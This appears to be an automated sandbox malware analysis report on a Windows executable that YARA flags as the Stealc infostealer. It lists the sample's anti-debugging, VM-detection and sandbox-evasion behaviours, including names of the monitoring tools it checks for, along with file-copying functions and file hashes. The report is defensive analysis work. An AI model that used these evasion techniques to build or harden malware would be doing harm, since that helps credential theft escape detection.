Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0375 second address: 54D03DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ah, 95h 0x0000000c push edi 0x0000000d mov dl, al 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F60F12493ABh 0x00000018 pushfd 0x00000019 jmp 00007F60F12493B8h 0x0000001e and eax, 2C2F01B8h 0x00000024 jmp 00007F60F12493ABh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov eax, edx 0x00000031 call 00007F60F12493B7h 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D03DE second address: 54D0400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0400 second address: 54D041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D041D second address: 54D044F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F1137228h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D044F second address: 54D045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E618F4 second address: E618FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F60F1137216h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E618FE second address: E61902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E5687E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E67C0F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CB1AED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EDEBAA instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00A638B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A64910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_00A5DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_00A5E430
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_00A5ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_00A64570
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00A63EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A5F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A516D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A5DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_00A5BE70

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A51160 GetSystemInfo,ExitProcess,

1_2_00A51160

Source: file.exe, file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWm0>
Source: file.exe, 00000001.00000002.1365721662.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1322360305.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.0000000001473000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware7
Source: file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A545C0 VirtualProtect ?,00000004,00000100,00000000

1_2_00A545C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

1_2_00A69860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A69750 mov eax, dword ptr fs:[00000030h]

1_2_00A69750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

1_2_00A678E0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A69600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00A69600

Source: file.exe, file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: )Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

1_2_00A67B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A67980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

1_2_00A67980

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A67850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

1_2_00A67850

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A67A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

1_2_00A67A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 1.2.file.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 1.2.file.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1522357
Product:	CloudBasic
Start time:	00:29:08
Start date:	30.09.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0079fd2131677b1d9eab7228129b05c6
SHA1:	b990a78e97be25d3296df08c7fd3c2c2491804cb
SHA256:	e5d54dbfb6aa3a373538a399c8727551d092d8980fe263cccda5b4b910154a04
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by